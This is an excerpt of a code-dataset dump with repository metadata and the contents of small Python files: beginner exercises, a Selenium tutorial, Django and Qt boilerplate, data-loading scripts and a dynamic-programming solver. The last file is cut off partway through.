blob_id (stringlengths 40–40) | directory_id (stringlengths 40–40) | path (stringlengths 5–283) | content_id (stringlengths 40–40) | detected_licenses (sequencelengths 0–41) | license_type (stringclasses, 2 values) | repo_name (stringlengths 7–96) | snapshot_id (stringlengths 40–40) | revision_id (stringlengths 40–40) | branch_name (stringclasses, 58 values) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 12.7k–662M, ⌀) | star_events_count (int64, 0–35.5k) | fork_events_count (int64, 0–20.6k) | gha_license_id (stringclasses, 11 values) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (stringclasses, 43 values) | src_encoding (stringclasses, 9 values) | language (stringclasses, 1 value) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64, 7–5.88M) | extension (stringclasses, 30 values) | content (stringlengths 7–5.88M) | authors (sequencelengths 1–1) | author (stringlengths 0–73)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2b7caf37f30825099c1f1f2a7a8bd1b45c4da7b0 | f4fae74a825f0eb9b56a953eb775e56075f91deb | /LeyendoArchivos.py | 63c44df7b323b408e83ba93c91f93cfbfe2cc2af | [] | no_license | danielmserna/U.-Austral.-Estructuras-de-datos-en-Python | 2b66bedc41dd9424cfcc0469598d9700780b154d | d6000ea88e204c0bb12b3f349bf72457a66878c0 | refs/heads/main | 2023-01-14T00:13:03.851522 | 2020-11-05T14:42:09 | 2020-11-05T14:42:09 | 310,319,126 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 585 | py | with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
print(a_file.read())
with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
print(a_file.readline())
with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
print(a_file.readlines())
with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
print(list(a_file))
with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
for line in a_file:
        print(line)
| [
"[email protected]"
] | |
ab1ff40b720f6d74fe8a729bd1cf8e28e0eb4b96 | 4603d5e087b8100b554caaa7fdbbdd5add32532e | /scripts/subset_db.py | af8f23648fb05ae1896e6c146c82aaeb0b4f758d | [] | no_license | sayan3710/summary_annotation | 4fd3f7b90c4b66942fbe95bb58d77987f5b0a1eb | 59961d959087a83e7ed9e2c60a7b089bcae87c63 | refs/heads/master | 2022-11-18T09:32:18.644364 | 2020-07-21T06:48:41 | 2020-07-21T06:48:41 | 281,316,276 | 0 | 0 | null | 2020-07-21T06:37:28 | 2020-07-21T06:37:28 | null | UTF-8 | Python | false | false | 2,756 | py |
import random
import json
import pandas as pd
import sqlite3
# THIS database will be modified; in practice,
# you'll want to copy the original populated db then
# run this script.
db_path = "../data/summaries_subset.db"
def connect_to_db():
conn = sqlite3.connect(db_path)
c = conn.cursor()
return conn, c
def remove_all_except(cochrane_ids):
conn, c = connect_to_db()
# drop from generated_summaries and target_summaries
# tables where the associated Cochrane ID is not
# in the list
query = "DELETE FROM generated_summaries WHERE cochrane_id NOT IN ({})".format(", ".join("?" * len(cochrane_ids)))
c.execute(query, cochrane_ids)
# now also drop the references
query = "DELETE FROM target_summaries WHERE cochrane_id NOT IN ({})".format(", ".join("?" * len(cochrane_ids)))
c.execute(query, cochrane_ids)
conn.commit()
conn.close()
def random_sample_cochrane_ids(n, dont_pick=None):
if dont_pick is None:
dont_pick = []
conn, c = connect_to_db()
excluded_cochrane_ids = []
query = "SELECT cochrane_id FROM target_summaries"
all_cochrane_ids = [c_id[0] for c_id in c.execute(query).fetchall()]
cochrane_ids_with_all_outputs = []
# exclude cases where we do not have an output for all systems;
# this can happen specifically for variants that use RoB prioritization
# because the model may not have returned a score for these, in which
# case, the system deemed them to be not RCTs.
# UPDATE this has been resolved, but we still use this to drop
# studies we wish to explicitly not consider (e.g., that have already
# been annotated)
expected_n_systems = 5
for c_id in all_cochrane_ids:
q = "SELECT DISTINCT system_id FROM generated_summaries WHERE cochrane_id=?"
systems = c.execute(q, (c_id,)).fetchall()
n_unique_systems = len(systems)
if (n_unique_systems == expected_n_systems) and (c_id not in dont_pick):
cochrane_ids_with_all_outputs.append(c_id)
else:
excluded_cochrane_ids.append(c_id)
n_excluded = len(set(excluded_cochrane_ids))
print("excluded {} reviews!".format(n_excluded))
return random.sample(cochrane_ids_with_all_outputs, n)
def make_pilot():
iain_already_labeled = ['CD000036', 'CD000020', 'CD000025', 'CD000052', 'CD000019', 'CD000088']
# now add a random set; here we do 18 reviews, which would yield 90 labels to do beyond
# the 30 for the above (5 systems per) -- totalling 120 labels todo.
random_set = random_sample_cochrane_ids(18, dont_pick=iain_already_labeled)
to_keep = iain_already_labeled + random_set
# TMP
remove_all_except(to_keep)
make_pilot()
| [
"[email protected]"
] | |
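
The header comment in subset_db.py warns that the script mutates its database in place and should be run against a copy of the original. A minimal sketch of that copy step, run before the script; the `summaries.db` source filename is an assumption, since only `summaries_subset.db` appears in the script:

```python
# Hypothetical pre-step: work on a copy so the destructive DELETEs
# in subset_db.py never touch the original populated database.
import shutil

SOURCE_DB = "../data/summaries.db"          # assumed name of the original db
WORKING_DB = "../data/summaries_subset.db"  # the path subset_db.py modifies

shutil.copyfile(SOURCE_DB, WORKING_DB)
```
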
a7f870fac2e9bd47975cd69ece03201e255a3a5b | c55be023d5941141f4346228691f786e1042eddd | /goods/migrations/0013_auto_20161207_1937.py | 6c165c68ab6146f8bc838c24431c6cfabe54f454 | [] | no_license | SantiagoYoung/new_adw | cd426c3cbcfc412cad9478c041ffdf9a61777968 | 4dafba5979c49b8b28042c381b4e9b8e3771125d | refs/heads/master | 2021-01-20T07:36:27.271345 | 2017-05-02T09:55:12 | 2017-05-02T09:55:12 | 90,017,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.utils.timezone import utc
import datetime
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('goods', '0012_auto_20161207_1622'),
]
operations = [
migrations.AddField(
model_name='goods',
name='collecters',
field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, null=True, verbose_name='\u6536\u85cf\u8005', blank=True),
),
migrations.AlterField(
model_name='bigtype',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 519492, tzinfo=utc)),
),
migrations.AlterField(
model_name='carouselfigure',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 518564, tzinfo=utc)),
),
migrations.AlterField(
model_name='goods',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 521671, tzinfo=utc), verbose_name='\u53d1\u5e03\u65f6\u95f4'),
),
migrations.AlterField(
model_name='goodscollection',
name='collected_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 523998, tzinfo=utc)),
),
migrations.AlterField(
model_name='smalltype',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 520349, tzinfo=utc)),
),
]
| [
"[email protected]"
] | |
39b74b1e402c37a563bc2ad9ab53e5dc02a696c4 | 419a0025e17904486aab7a642b6480123e76b367 | /stalk/models/__init__.py | 4c8161b5f8efcab4dd625dfa301bb8f07c6a7fa2 | [] | no_license | wagaman/dollop | 4b3e4016f3f62aba21093b0345fb3e611a96733e | b8c8e98958359a5d99e7d097aa6c36114fab28e3 | refs/heads/master | 2020-03-22T01:08:05.905580 | 2017-08-03T08:56:03 | 2017-08-03T08:56:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | import p2peye
import product
import lingyi
import xinhua
import rong360
import xianjindai
import dailuopan
import baoxian
import nifa
__all__ = ['nifa', 'dailuopan', 'xianjindai', 'rong360', 'p2peye', 'product', 'lingyi', 'xinhua']
| [
"[email protected]"
] | |
870c73c7f33c0d63dc0eaa504790394ac4caba1a | ab6996c3a3117cb64ba2805b1fd9cb0756f8ecbd | /PP4E/Preview/update_db_shelve.py | 74815c70e795c8b42a4b25424e8d0aca4f7fa1f5 | [] | no_license | LingFangYuan/Learning | ea8742e8f340ea337185d4b8c07bfe3b73fcfde8 | e71a3b38dca36de5427869b11341302deb6c55dd | refs/heads/master | 2021-06-30T16:46:22.424896 | 2020-10-19T01:13:40 | 2020-10-19T01:13:40 | 183,213,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import shelve
db = shelve.open('people-shelve')
sue = db['sue']
sue['pay'] *= 1.5
db['sue'] = sue
db['ling'] = {}
db.close()
| [
"[email protected]"
] | |
f7d65e6fc6ca47d8a56c039426bd3d9c9df6c6ba | b7e60a0a1341a8c91e6690e49c0d37ac34b20693 | /empresas/serializers.py | 2eceed72a3bc22b180812a7ec8b5152a58bc3254 | [] | no_license | staylomak/AzurianTrack | b25fa052f26491057f6da1680402cab1ab3cd02b | 6feb6c7a3913cdcc7afc9e04b3321ec7e62453ea | refs/heads/master | 2020-05-02T10:18:46.666003 | 2019-03-27T01:24:27 | 2019-03-27T01:24:27 | 177,893,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | # -*- coding: utf-8 -*-
from rest_framework.serializers import ModelSerializer
from .models import CamposOpcionalesEmail, Empresa, Holding
class HoldingSerializer(ModelSerializer):
class Meta:
model = Holding
fields = ('nombre',)
class EmpresaSerializer(ModelSerializer):
holding = HoldingSerializer(many=False, read_only=True)
class Meta:
model = Empresa
fields = ('rut', 'empresa', 'holding')
class CamposOpcionalesEmailSerializer(ModelSerializer):
class Meta:
model = CamposOpcionalesEmail
fields = ('empresa', 'opcional1', 'opcional2', 'opcional3',)
| [
"[email protected]"
] | |
15b38a03fb4b38b9c3bda63281accb435b88179c | d328169faa502930d16f1a9c476dcfba0f7f02b4 | /ex5.py | 765a98ade1d66ce144d9de689f711f997206cfa0 | [] | no_license | Siilbon/pythonthehardway | 39898126da84c0f0b9354b455195d3490dd42be5 | 9d150f9925e17e17e28f0b5d238627ba6a484d6a | refs/heads/master | 2021-09-07T15:05:05.395669 | 2018-02-24T15:23:15 | 2018-02-24T15:23:15 | 106,835,787 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 612 | py | name = "Karl Siil"
age = 23 # As of 5/15/2015
height = 71.0 # inches
weight = 215.0 #lbs
eyes = 'Brown'
teeth = 'white'
hair = 'Brown'
print "Let's talk about %s" % name
print "He's %r cm tall." % (height*2.54) #inches to cm
print "He's %d years old" % age
print "He's %r Kg heavy." % (weight*2.2) #lbs to kg
print "Actually that's not too heavy."
print "He's got %s eyes and %s hair." % (eyes, hair)
print "His teeth are usually %s depending on the coffee." % teeth
# this line is tricky, try to get it exactly right
print "if I add %d, %d, and %d I get %d." % ( age,
height, weight, age + height + weight)
| [
"[email protected]"
] | |
82caa68a12d070a69978a215ee61d9c3aa18053d | 31a76579ea3370f140fbebeb57dc47c17244bb11 | /lesson2_1_step6.py | dd1e6d54c0f238a79c8eb05cff6456be69d4c660 | [] | no_license | Homo-Deus/PythonSelenium | ad13fa2c24ee1ade13ba970c2634f6622e4c2885 | cd2fbc0054dda25923ebc132935e14587aec76c6 | refs/heads/master | 2020-09-30T01:44:32.413732 | 2019-12-11T08:31:15 | 2019-12-11T08:31:15 | 227,169,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 952 | py | from selenium import webdriver
import math
import time
def calc(x):
return str(math.log(abs(12*math.sin(int(x)))))
link = "http://suninjuly.github.io/get_attribute.html"
try:
browser = webdriver.Chrome()
browser.get(link)
x_element = browser.find_element_by_id("treasure")
x = x_element.get_attribute("valuex")
y = calc(x)
input_field = browser.find_element_by_css_selector("#answer")
input_field.send_keys(y)
checkbox = browser.find_element_by_css_selector("#robotCheckbox")
checkbox.click()
radioBtn = browser.find_element_by_css_selector("#robotsRule")
radioBtn.click()
submit = browser.find_element_by_xpath("//button[text()='Submit']")
submit.click()
finally:
    # leave time to copy the code from the page (originally 30 seconds)
time.sleep(5)
    # close the browser after all the manipulations
browser.quit() | [
"[email protected]"
] | |
fe43abde2c1af9bfc5f37ae172948ea339cc62b2 | ef2353839816c680f4de3f47aed14df740785962 | /demo.py | 22bd11b2c8ba71f9b91a253c9d1ecfda89cb6da6 | [] | no_license | concpetosfundamentalesprogramacionaa19/practica220419-davisalex22 | 4ebee746451a2287c83f4c50c976f44838c0fada | 927aa0edfaac1c014a3e64bc30f546b678b90ad7 | refs/heads/master | 2020-05-16T06:53:47.965138 | 2019-04-22T21:48:28 | 2019-04-22T21:48:28 | 182,862,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | """
Python language example
author: @davidsalazar
"""
import sys
variable = sys.argv[0]
dato1 = sys.argv[1]
dato2 = sys.argv[2]
dato3 = sys.argv[3]
# Show the results
print("variable argv [0]: %s" % variable)
print("variable argv [1]: %s" % dato1)
print("variable argv [2]: %s" % dato2)
print("variable argv [3]: %s" % dato3)
| [
"[email protected]"
] | |
764f1d7e0026b8f056deeb99fcf5c17182fb0eae | c2b9bebe226701539439ce15e00359690809a613 | /venv/bin/virtualenv | 96d2e4bfa218b7800c144b14089aa5d9b67bc95d | [] | no_license | arielbk/kalender-heroku | 15b6e09de1e7a2da5e110933867d8c8f750ebb93 | f276a99092be9af78d85224c0acfac6099c45a79 | refs/heads/master | 2022-12-12T22:47:41.084877 | 2018-05-24T20:45:17 | 2018-05-24T20:45:17 | 131,035,880 | 1 | 0 | null | 2022-12-08T00:59:23 | 2018-04-25T16:39:03 | Python | UTF-8 | Python | false | false | 256 | #!/Users/arielbk/Documents/Dev/kalender_post/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from virtualenv import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
ead9ed3ce662bd87d92fac6851265fbfb5796cd4 | ca097eb1cbb92786c2bd925ec2bf86c8123e9305 | /Week 6 Dynamic Programming Part 2/partitioning_souvenirs.py | 18fa19efd4425be99a752b3ab395ae12812a249c | [] | no_license | he-is-james/Algorithmic-Toolbox | 5ef655dd7e2f6b91f826bcf194c0debfbbb43c9e | 1f7c9b91082d96a22cb28dd097cace23722070cf | refs/heads/master | 2022-12-23T23:08:17.059041 | 2020-09-26T01:30:25 | 2020-09-26T01:30:25 | 290,607,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | import numpy
def eq_partitions(W, n, v_list):
if n < 3:
return 0
elif sum(v_list) % 3 != 0:
return 0
else:
count = 0
value = numpy.zeros((W+1, n+1))
for i in range(1, W+1):
for j in range(1, n+1):
value[i][j] = value[i][j-1]
if v_list[j-1] <= i:
t = value[i-v_list[j-1]][j-1] + v_list[j-1]
if t > value[i][j]:
value[i][j] = t
if value[i][j] == W:
count += 1
if count < 3:
return 0
else:
return 1
n = int(input())
v_list = list(map(int, input().split()))
W = sum(v_list)//3
print(eq_partitions(W, n, v_list)) | [
"[email protected]"
] | |
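
The solver above reads its input from stdin (item count on the first line, the values on the second). A hedged way to exercise it end-to-end; the sample values are arbitrary:

```python
# Drive partitioning_souvenirs.py through a pipe with sample input.
import subprocess

sample = "6\n1 2 3 4 5 6\n"  # six souvenirs, total 21, so each share is W = 7
result = subprocess.run(
    ["python", "partitioning_souvenirs.py"],
    input=sample, capture_output=True, text=True,
)
print(result.stdout.strip())  # the script prints 1 (splittable) or 0 (not)
```
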
d565638f4fcdd31042919c750cae9513d15bb872 | 3e264d0f060184f1c8b6da0531a64ba800574c7d | /app.py | f4c229e3ec063c7cf604ea7f244aa3f179325f9d | [
"Apache-2.0"
] | permissive | gios91/max-ingress-parser | ccc5e67d924a2117e9f57e49ce708e6289e81836 | 1b7682d3821c9043cfbf4867563f64a1b057c16c | refs/heads/main | 2023-01-08T09:55:14.748045 | 2020-11-20T16:52:03 | 2020-11-20T16:52:03 | 314,611,065 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,420 | py | import sys
import json
import csv
INGRESS_URL = "https://intel.ingress.com/intel?ll={}&z=17&pll={}"
def main(input_file_path,output_file_path):
L_out = []
L_out.append("{};{};{};{}".format('portal','url','priority','category'))
f = open(input_file_path, 'r')
json_data = json.load(f)
for portals_id in json_data['portals']:
portal_category = json_data['portals'][portals_id]['label'].rstrip()
for portal_id in json_data['portals'][portals_id]['bkmrk']:
try:
portal_data = json_data['portals'][portals_id]['bkmrk'][portal_id]
row = "{};{};{};{}".format(portal_data['label'].rstrip(),INGRESS_URL.format(portal_data['latlng'].rstrip(),portal_data['latlng'].rstrip()),str(0),portal_category)
print(row)
L_out.append(row)
except UnicodeEncodeError as e:
print("WARNING: {}".format(e))
continue
print("# portals parsed: {}".format(str(len(L_out))))
_write_csv(output_file_path, L_out)
def _write_csv(output_file_path, L_out):
out_file = open(output_file_path, "w")
for line in L_out:
# write line to output file
out_file.write(line)
out_file.write("\n")
out_file.close()
if __name__ == '__main__':
input_file_path = sys.argv[1]
output_file_path = sys.argv[2]
main(input_file_path,output_file_path) | [
"[email protected]"
] | |
3894f61eafb3a91ce6cd4f3f3e254805de81d0d0 | b23d294fdffabe72c336644f119860f5ce704eef | /python_1000phone/语言基础-老师代码/day8-字符串/code/02-字符串和字符.py | 75a1fa306e187150928f8bf8c0d74e26891d4247 | [] | no_license | ikaros274556330/my_code | 65232758fd20820e9f4fa8cb5a6c91a1969862a2 | 92db21c4abcbd88b7bd77e78d9f660b4534b5071 | refs/heads/master | 2020-11-26T09:43:58.200990 | 2019-12-23T02:08:39 | 2019-12-23T02:08:39 | 229,032,315 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,997 | py | """__author__=余婷"""
# 1. What is a string (str)?
"""
A string is a container data type that uses ''/""/''''''/"""""" as its container delimiters; every element in the container is a character.
Strings are immutable (adding, removing, and modifying elements are not supported) and ordered (indexing is supported).
"""
str1 = 'hello\n123'
str2 = "你好"
str3 = '''thanks
123
456'''
str4 = """谢谢"""
print(type(str1), type(str2), type(str3), type(str4))
print(str1)
print(str3)
print('============================================')
# 2. Elements of a string - characters
"""
Python only has the notion of a character; there is no dedicated character type. A quoted string containing a single element can be treated as a character.
A string is also called a character set.
1) Characters in a string - in principle, any symbol that can be typed on a keyboard or pasted from elsewhere can be a character:
   '和健身房', 'shuASSS', '2378', '+-===!@&*#@', '♠'
   a. Ordinary characters: characters that stand for themselves in a string (symbols with no special meaning or function).
   b. Escape characters: symbol combinations with special meaning or function, usually starting with \:
     \n - newline
     \' - a literal '
     \" - a literal "
     \t - an indent (tab key)
     \\ - a literal \
     Note: every escape sequence has a length of 1.
   c. Encoded characters.
2) Suppressing escapes: prefixing a string with r/R disables every escape character in it (each symbol then stands for itself).
"""
# \u followed by a 4-digit hex number - an encoded character (yields the character whose code value is that 4-digit hex number)
str1 = 'abc\n123'
print(str1)
str2 = 'abc\'1\"23'
print(str2)
str3 = '\tabc'
print(str3)
str4 = 'abc\\n123'
print(str4)
str5 = 'abc\u4eff'
print(str5)
str6 = R'\tabc\n\'123'
print(str6)
# 3. Character encodings
"""
Computers cannot store characters (symbols) directly; they can only store numbers.
To make characters storable, every character is associated with a fixed number (that fixed number is the character's code value).
The one-to-one mapping between characters and numbers is an encoding table: the ASCII table, or the Unicode table (used by Python).
1) ASCII table - one byte per character (128 characters in total), covering all letters, digits, and common US symbols.
   '0' ~ '9': code values increase consecutively starting from 48.
   Uppercase letters have smaller code values than lowercase letters.
   Uppercase and lowercase letters are not adjacent in the table.
2) The Unicode table is an extension of ASCII and covers the symbols of every country and language (its basic plane alone holds 65,536 code points).
   ASCII codes: 0 ~ 127
   Range of Chinese characters: 0x4e00 ~ 0x9fa5
"""
# 1. Encoded characters: \u plus a 4-digit hex code value
str1 = 'abc\u50ff'
print(str1)
# 2. chr(code) - get the character corresponding to a code value
print(chr(97))
num = 0
for x in range(0x4e00, 0x9fa5+1):
print(chr(x), end=' ')
num += 1
if num % 30 == 0:
print()
print()
for x in range(0x0F00, 0x0FFF+1):
print(chr(x), end=' ')
print()
for x in range(0x2400, 0x243F+1):
print(chr(x), end=' ')
print()
# 3. ord(char) - get the code value of the given character
print(hex(ord('余')))
print(hex(ord('婷')))
| [
"[email protected]"
] | |
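
The lesson above works at the level of code points (chr/ord) but never shows how characters become stored bytes; a small standard-library sketch bridging the two, using the author's name from the file as sample text:

```python
# Round-trip between text, Unicode code points, and UTF-8 bytes.
s = '余婷'
code_points = [hex(ord(ch)) for ch in s]  # ['0x4f59', '0x5a77']
encoded = s.encode('utf-8')               # b'\xe4\xbd\x99\xe5\xa9\xb7'
decoded = encoded.decode('utf-8')         # back to the original string
assert decoded == s
print(code_points, encoded)
```
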
6a4b599a205b1ec386d7c58c45240aa57ea5de87 | b9fb2d6aa7506845dcdac833c6cfb82feede3a07 | /AdventOfCode/2021/download.py | d006f37e98d851603f2611452f98b391b939e86d | [
"Unlicense"
] | permissive | wandyezj/scripts | a28e4a8bc30d6fa78d0af6db5c905cc4b7a0c714 | 871438873ec79435e5e3e5d576c18045c0907b18 | refs/heads/master | 2023-02-18T10:25:04.542276 | 2022-12-06T06:01:09 | 2022-12-06T06:01:09 | 182,362,358 | 0 | 0 | Unlicense | 2023-02-09T04:36:45 | 2019-04-20T05:02:50 | Python | UTF-8 | Python | false | false | 929 | py | import urllib.request
def download_data(year, day, session):
url = r'''https://adventofcode.com/{}/day/{}/input'''.format(year, day)
print(url)
opener = urllib.request.build_opener()
opener.addheaders = [('cookie', 'session={}'.format(session))]
response = opener.open(url)
#print(response)
data = response.read().decode('utf-8')
#print(data)
return data
def write_file(file, data):
f = open(file, 'w')
f.write(data)
f.close()
import sys
def run():
    # unpacking sys.argv raises a ValueError before the None checks
    # could ever run, so validate the argument count first
    if len(sys.argv) != 4:
        print("usage: year day session")
        return
    name, year, day, session = sys.argv
print('''
year: {}
day: {}
session: {}
'''.format(year, day, session))
data = download_data(year, str(int(day)), session)
file = "{}.data.txt".format(str(int(day)).zfill(2))
print()
print(file)
write_file(file, data)
run()
| [
"[email protected]"
] | |
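
For reference, the script above is driven purely by sys.argv; a hedged invocation sketch (the session value is a placeholder, not a real Advent of Code cookie):

```python
# Equivalent of running:  python download.py 2021 1 <session>
# which fetches https://adventofcode.com/2021/day/1/input with the
# session cookie and writes the puzzle input to 01.data.txt.
import subprocess

subprocess.run(
    ["python", "download.py", "2021", "1", "PLACEHOLDER_SESSION"],
    check=True,
)
```
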
a1e50554334dad6f32cf1d7d7d78bc7436fad158 | 68ed4984d29a49f28053b47ce112e46c6c71c812 | /population/population/serializers.py | 19c252b9c7c71426559c5e5cdf6fe70ff86d4d04 | [
"BSD-3-Clause"
] | permissive | Zachary-Jackson/Population-Statistical-Visualization | f3c5feac0b50a2d16bdbe9d28d891f9720a88048 | 6d29119e8f7d181786293b6bd3f0c1900a1fa6b7 | refs/heads/master | 2020-04-05T02:03:08.857800 | 2018-12-17T20:41:13 | 2018-12-17T20:41:13 | 156,461,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | from rest_framework import serializers
from .models import Location
class LocationSerializer(serializers.ModelSerializer):
"""Serializer for a Location object showing all fields"""
class Meta:
model = Location
fields = '__all__'
| [
"[email protected]"
] | |
3c63ca93c357aeefbd628cfc7ab30f7287c82135 | 7e7a16fc6bc7359d4633e01b19dd8803b756303d | /hw_2/load_data_fast.py | ee29709e16c8d5edfda03a06c9383f2200758364 | [] | no_license | Anthony1128/Hw_data_engine | 345d1aa2a7969afae91084fae7e741187139a854 | 68c05828ddbd0ba594f4a4720c58c32d7517a1bc | refs/heads/main | 2023-03-09T11:39:16.232717 | 2021-02-01T23:03:51 | 2021-02-01T23:03:51 | 301,472,555 | 0 | 0 | null | 2021-01-06T23:30:06 | 2020-10-05T16:31:05 | Python | UTF-8 | Python | false | false | 1,739 | py | import os
import psycopg2
import csv
import time
start_time = time.time()
# creating dialect to proper csv reading
csv.register_dialect('mydialect', delimiter=',', quoting=csv.QUOTE_ALL, doublequote=True)
# DB parameters
os.environ['HOST'] = 'localhost'
os.environ['DB_NAME'] = 'postgres'
os.environ['DB_USER'] = 'postgres'
HOST = os.environ.get('HOST')
DB_NAME = os.environ.get('DB_NAME')
USER = os.environ.get('DB_USER')
# preparing sql query CREATE TABLE from csv file
def create_tab(csv_file='P9-ConsumerComplaints.csv'):
with open(csv_file, 'r') as file:
reader = csv.reader(file, dialect='mydialect')
first_line = next(reader)
# create_table = 'CREATE TABLE ConsumerComplaints (id SERIAL PRIMARY KEY,'
create_table = 'CREATE TABLE ConsumerComplaints ('
for id_c, column in enumerate(first_line):
if id_c == len(first_line) - 1:
# create_table += f'"{column}" int);'
create_table += f'"{column}" int PRIMARY KEY);'
elif id_c == 0:
create_table += f'"{column}" date, '
else:
create_table += f'"{column}" text, '
return create_table
def main():
# connecting to db
conn = psycopg2.connect(host=HOST, dbname=DB_NAME, user=USER)
cur = conn.cursor()
# executing query to create table and load data in it
cur.execute(create_tab())
query = '''
COPY consumercomplaints FROM stdin WITH CSV HEADER
DELIMITER as ','
'''
with open('P9-ConsumerComplaints.csv', 'r') as file:
cur.copy_expert(sql=query, file=file)
conn.commit()
cur.close()
conn.close()
if __name__ == '__main__':
main()
print(f'time of performance: {time.time() - start_time} seconds')
| [
"[email protected]"
] | |
24115c94d48eee633cd07f1eee258476798db279 | 252974316cf3b44afa550ea202abe67b474d698e | /recipies/python/paulwinex/projectManager/widgets/createProject_UIs.py | 7aeaf44be5239a954c7f3053b5013c38bbd22249 | [] | no_license | igor-si/shared | 22892dc1c93d97591495ed48dbeecd741bdd6dfd | 45301c31814e87a6e5a28d857e9b2ef6421b5c16 | refs/heads/master | 2020-07-17T12:35:33.425496 | 2019-12-17T08:36:48 | 2019-12-17T08:36:48 | 206,020,718 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,934 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'G:\projects\pyqt\week2\projectManager\widgets\createProject.ui'
#
# Created: Thu Oct 09 13:31:14 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_createDialog(object):
def setupUi(self, createDialog):
createDialog.setObjectName("createDialog")
createDialog.resize(240, 219)
self.verticalLayout = QtGui.QVBoxLayout(createDialog)
self.verticalLayout.setObjectName("verticalLayout")
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.label = QtGui.QLabel(createDialog)
self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.name_lb = QtGui.QLineEdit(createDialog)
self.name_lb.setObjectName("name_lb")
self.gridLayout.addWidget(self.name_lb, 0, 1, 1, 1)
self.label_2 = QtGui.QLabel(createDialog)
self.label_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTop|QtCore.Qt.AlignTrailing)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.comment_te = QtGui.QPlainTextEdit(createDialog)
self.comment_te.setObjectName("comment_te")
self.gridLayout.addWidget(self.comment_te, 1, 1, 1, 1)
self.verticalLayout.addLayout(self.gridLayout)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.create_btn = QtGui.QPushButton(createDialog)
self.create_btn.setObjectName("create_btn")
self.horizontalLayout.addWidget(self.create_btn)
self.cancel_btn = QtGui.QPushButton(createDialog)
self.cancel_btn.setObjectName("cancel_btn")
self.horizontalLayout.addWidget(self.cancel_btn)
self.verticalLayout.addLayout(self.horizontalLayout)
self.retranslateUi(createDialog)
QtCore.QMetaObject.connectSlotsByName(createDialog)
def retranslateUi(self, createDialog):
createDialog.setWindowTitle(QtGui.QApplication.translate("createDialog", "Dialog", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("createDialog", "Name", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("createDialog", "Comment", None, QtGui.QApplication.UnicodeUTF8))
self.create_btn.setText(QtGui.QApplication.translate("createDialog", "Create", None, QtGui.QApplication.UnicodeUTF8))
self.cancel_btn.setText(QtGui.QApplication.translate("createDialog", "Cancel", None, QtGui.QApplication.UnicodeUTF8))
| [
"[email protected]"
] | |
4e9fe89de9f027a5523df7711cf3bf7afe7f2fd8 | 48ac73068d4b9f54eedeca1bf91711c3d5d1ab46 | /src/make_features/85_transformer_seq3.py | 1c55da4f21b50eb5b8ebd93c85fdcd41adcf3c53 | [] | no_license | Naoki1101/kaggle-riiid | ae260d8e75c54c2ac9d8f4a5b1a39eaed7e5319a | 223148098bfe93d5c1812ef1f94c40989ee52642 | refs/heads/main | 2023-02-23T12:15:41.768719 | 2021-01-25T00:37:21 | 2021-01-25T00:37:21 | 318,398,912 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,729 | py | import sys
import numpy as np
import pandas as pd
from tqdm import tqdm
from pathlib import Path
sys.path.append('../src')
import const
from utils import DataHandler
dh = DataHandler()
MAX_SEQ = 101
usecols = ['row_id', 'user_id', 'content_id', 'timestamp', 'prior_question_elapsed_time', 'part', 'answered_correctly', 'is_val']
